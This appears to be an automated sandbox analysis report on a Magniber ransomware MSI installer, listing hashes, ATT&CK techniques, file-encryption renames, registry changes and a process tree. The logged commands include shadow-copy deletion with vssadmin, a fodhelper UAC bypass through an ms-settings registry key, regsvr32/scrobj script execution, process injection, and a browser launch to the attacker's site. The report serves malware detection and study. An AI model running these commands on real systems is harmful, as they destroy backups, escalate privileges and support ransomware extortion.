magniber | 805b51368b9b72794aa52fbc957b4617ce6a7517f8b4ae85698ddd036cdbb7ea

Analysis

max time kernel
143s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
29-11-2022 10:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
Size

1.1MB
MD5

250a23219a576180547734430d71b0e6
SHA1

a5bcdb824d325d44c5e0feb5bf9389da520e6f82
SHA256

fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55
SHA512

e0c26cceff37d9328dddc9989ff75070b51a3ccd35c93e82fdcda3a828a90ac53d8604524f5195cc9d4865aa8680ccfd79f6d85710b46496ab9efea321c13417
SSDEEP

1536:j66iqjTbG3VvotZmMi0W7Ap0Ds0Dm78x:jAGelvoW0dQx

Score

10^/10

magniber persistence ransomware

Malware Config

Signatures

Detect magniber ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral6/memory/1116-144-0x000001E5EAA90000-0x000001E5EAB9F000-memory.dmp	family_magniber
behavioral6/memory/2428-145-0x000001E8B66D0000-0x000001E8B66D3000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

MsiExec.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\ExpandCompress.png => C:\Users\Admin\Pictures\ExpandCompress.png.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\OptimizeUnprotect.png => C:\Users\Admin\Pictures\OptimizeUnprotect.png.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\PingSet.png => C:\Users\Admin\Pictures\PingSet.png.yuyevbg	MsiExec.exe
File opened for modification	C:\Users\Admin\Pictures\PingSkip.tiff	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\PingSkip.tiff => C:\Users\Admin\Pictures\PingSkip.tiff.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\SkipFind.tif => C:\Users\Admin\Pictures\SkipFind.tif.yuyevbg	MsiExec.exe
File renamed	C:\Users\Admin\Pictures\CompareSend.crw => C:\Users\Admin\Pictures\CompareSend.crw.yuyevbg	MsiExec.exe

Loads dropped DLL 1 IoCs

Processes:

MsiExec.exe

pid process

1116 MsiExec.exe
Adds Run key to start application 2 TTPs 1 IoCs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe

pid	process
1116	MsiExec.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	msedge.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

MsiExec.exe

description	pid	process	target process
PID 1116 set thread context of 2428	1116	MsiExec.exe	sihost.exe
PID 1116 set thread context of 2464	1116	MsiExec.exe	svchost.exe
PID 1116 set thread context of 2588	1116	MsiExec.exe	taskhostw.exe

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20221129104840.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\959cd9b8-68bf-40f7-a544-e03fa77fe04b.tmp	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{8B0F0F68-120B-4579-87C8-8B074F5D9DFD}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI28D6.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI202A.tmp	msiexec.exe
File created	C:\Windows\Installer\e571dac.msi	msiexec.exe
File created	C:\Windows\Installer\e571daa.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e571daa.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000045e03923b2b2bc3e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000045e039230000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff00000000070001000068090045e03923000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000045e0392300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000045e0392300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid process

5488 vssadmin.exe
5524 vssadmin.exe
5516 vssadmin.exe
2388 vssadmin.exe
4568 vssadmin.exe
2628 vssadmin.exe

pid	process
5488	vssadmin.exe
5524	vssadmin.exe
5516	vssadmin.exe
2388	vssadmin.exe
4568	vssadmin.exe
2628	vssadmin.exe

Modifies registry class 15 IoCs

Processes:

regsvr32.exeregsvr32.exeregsvr32.exemsedge.exesihost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567"	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\ms-settings\shell\open\command\DelegateExecute	regsvr32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exe

pid	process
1004	msiexec.exe
1004	msiexec.exe
1116	MsiExec.exe
1116	MsiExec.exe
3636	msedge.exe
3636	msedge.exe
3648	msedge.exe
3648	msedge.exe
3420	identity_helper.exe
3420	identity_helper.exe

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

MsiExec.exe

pid process

1116 MsiExec.exe
1116 MsiExec.exe
1116 MsiExec.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

Processes:

msedge.exe

pid process

3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe

pid	process
1116	MsiExec.exe
1116	MsiExec.exe
1116	MsiExec.exe

pid	process
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exevssvc.exe

description	pid	process
Token: SeShutdownPrivilege	4928	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4928	msiexec.exe
Token: SeSecurityPrivilege	1004	msiexec.exe
Token: SeCreateTokenPrivilege	4928	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4928	msiexec.exe
Token: SeLockMemoryPrivilege	4928	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4928	msiexec.exe
Token: SeMachineAccountPrivilege	4928	msiexec.exe
Token: SeTcbPrivilege	4928	msiexec.exe
Token: SeSecurityPrivilege	4928	msiexec.exe
Token: SeTakeOwnershipPrivilege	4928	msiexec.exe
Token: SeLoadDriverPrivilege	4928	msiexec.exe
Token: SeSystemProfilePrivilege	4928	msiexec.exe
Token: SeSystemtimePrivilege	4928	msiexec.exe
Token: SeProfSingleProcessPrivilege	4928	msiexec.exe
Token: SeIncBasePriorityPrivilege	4928	msiexec.exe
Token: SeCreatePagefilePrivilege	4928	msiexec.exe
Token: SeCreatePermanentPrivilege	4928	msiexec.exe
Token: SeBackupPrivilege	4928	msiexec.exe
Token: SeRestorePrivilege	4928	msiexec.exe
Token: SeShutdownPrivilege	4928	msiexec.exe
Token: SeDebugPrivilege	4928	msiexec.exe
Token: SeAuditPrivilege	4928	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4928	msiexec.exe
Token: SeChangeNotifyPrivilege	4928	msiexec.exe
Token: SeRemoteShutdownPrivilege	4928	msiexec.exe
Token: SeUndockPrivilege	4928	msiexec.exe
Token: SeSyncAgentPrivilege	4928	msiexec.exe
Token: SeEnableDelegationPrivilege	4928	msiexec.exe
Token: SeManageVolumePrivilege	4928	msiexec.exe
Token: SeImpersonatePrivilege	4928	msiexec.exe
Token: SeCreateGlobalPrivilege	4928	msiexec.exe
Token: SeBackupPrivilege	4132	vssvc.exe
Token: SeRestorePrivilege	4132	vssvc.exe
Token: SeAuditPrivilege	4132	vssvc.exe
Token: SeBackupPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe
Token: SeTakeOwnershipPrivilege	1004	msiexec.exe
Token: SeRestorePrivilege	1004	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exemsedge.exe

pid process

4928 msiexec.exe
4928 msiexec.exe
3648 msedge.exe
3648 msedge.exe
3648 msedge.exe

pid	process
4928	msiexec.exe
4928	msiexec.exe
3648	msedge.exe
3648	msedge.exe
3648	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesvchost.exetaskhostw.exesihost.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 1004 wrote to memory of 4456	1004	msiexec.exe	srtasks.exe
PID 1004 wrote to memory of 4456	1004	msiexec.exe	srtasks.exe
PID 1004 wrote to memory of 1116	1004	msiexec.exe	MsiExec.exe
PID 1004 wrote to memory of 1116	1004	msiexec.exe	MsiExec.exe
PID 2464 wrote to memory of 3428	2464	svchost.exe	regsvr32.exe
PID 2464 wrote to memory of 3428	2464	svchost.exe	regsvr32.exe
PID 2588 wrote to memory of 3580	2588	taskhostw.exe	regsvr32.exe
PID 2588 wrote to memory of 3580	2588	taskhostw.exe	regsvr32.exe
PID 2428 wrote to memory of 4672	2428	sihost.exe	regsvr32.exe
PID 2428 wrote to memory of 4672	2428	sihost.exe	regsvr32.exe
PID 1116 wrote to memory of 4408	1116	MsiExec.exe	cmd.exe
PID 1116 wrote to memory of 4408	1116	MsiExec.exe	cmd.exe
PID 4408 wrote to memory of 3648	4408	cmd.exe	msedge.exe
PID 4408 wrote to memory of 3648	4408	cmd.exe	msedge.exe
PID 3648 wrote to memory of 1832	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1832	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 1708	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3636	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3636	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe
PID 3648 wrote to memory of 3472	3648	msedge.exe	msedge.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:4672
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:3564
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:2808
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:3512
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2628
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:268
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5140
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5344
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2464
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:3428
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:2628
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4120
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:2396
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2388
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:404
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5132
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5356
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5516

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2588
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/t2o7g3z
  2⤵
  - Modifies registry class
  PID:3580
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:444
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4408
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:1084
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4568
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:5016
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:5160
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/vovcg3567
      4⤵
      PID:5368
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5524

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\fffba37840957480e176802e89638fb53add9b39349241f8de52719f57a01d55.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4928

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1004
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4456
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding B2E78E36255B8113DB031270A26F0426
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://3404e2f8b4yuyevbg.diedsad.info/yuyevbg^&1^&47749682^&85^&419^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4408
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://3404e2f8b4yuyevbg.diedsad.info/yuyevbg&1&47749682&85&419&2219041
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:3648
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffd502546f8,0x7ffd50254708,0x7ffd50254718
        5⤵
        
        PID:1832
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
